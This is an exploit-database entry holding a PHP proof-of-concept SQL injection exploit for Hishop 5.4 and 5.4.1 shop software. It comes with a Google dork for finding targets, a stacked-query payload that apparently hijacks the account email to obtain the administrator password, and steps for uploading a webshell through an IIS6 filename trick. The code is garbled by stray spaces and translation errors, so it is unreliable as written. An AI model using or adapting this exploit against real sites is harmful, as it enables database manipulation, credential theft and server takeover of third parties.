Hishop 5.4 & 5.4.1 SQL injection



EKU-ID: 1871 CVE: OSVDB-ID:
Author: Hacker-Fire Published: 2012-04-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Vendor or Software Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html]
# Version: [ 5.4 & 5.4.1 ]
# Category:: [ webapps]
# Google dork: [intext:Hishop 5.4]
# Tested on: [Windows 7 ]
##################################################

[~] P0c [~] :

<? Php
print_r ('
+ ------------------------- +
Hishop 5.4 & 5.4.1 SQL injection the exploit By: Hacker-Fire
+ ------------------------- +
');
if ($ argc <3) {
print_r ('
+ ------------------------- +
Usage: php '. $ Argv [0].' Host Port Path RegMail
Example:
php '. $ argv [0].' localhost 80 / SHOES/category-92.aspx? valueStr = 35_0 ​​syc@myclover.org
+ ------------------------- +
');
exit;
}
$ Host = $ argv [1];
$ Port = $ argv [2];
$ Path = $ argv [3];
$ Mail = $ argv [4];
$ Expdata = "";
for ($ i = 0; $ i <strlen ($ mail); $ i + +)
$ Expdata = $ expdata. Dechex (ord ($ mail [$ i])). "00";
$ Expdata = strtoupper ($ expdata);
$ Expdata = "% 27)% 20or% 201 = 1; DECLARE% 20 @ S% 20NVARCHAR (4000)% 20SET% 20 @ S = CAST (". $ Expdata. "2700% 20AS% 20NVARCHAR (4000))% 20EXEC (S); - ";
GET ($ host, $ port, $ path, $ expdata, 30);

function GET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ") {
$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, 30);
if (! $ fp) {
echo "{$ the errstr} ({$ errno is}) <br /> \ n";
exit;
}

$ Out = "GET $ path $ data HTTP/1.1 \ r \ n";
$ Out. = "The Host: $ host: $ port \ r \ n";
$ Out. = "The Connection: CLOSE \ r \ n \ r \ n \ r \ n";

fwrite ($ fp, $ out);
while (! feof ($ fp)) {
fgets ($ fp, 128);
}
fclose ($ fp);
}

print_r ('
+ ------------------------- +
[+] Get Manager, the Password
[1] to [landing] - "[My Account] -" [personal information】
[2] E-mail the administrator password.
[3] the Good Luck!
+ ------------------------- +
[+] Get the WebShell (the IIS6)
Log in from [1] / admin / [commodity management] - "[Category template set】
[2] the upload 1.asp;. Html
[3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html
+ ------------------------- +
');
?>
##########################################################
[»] Greetz to :
                    
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ]
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]            
[ And all my Freinds + Algerian Hackers ]
      
##########################################################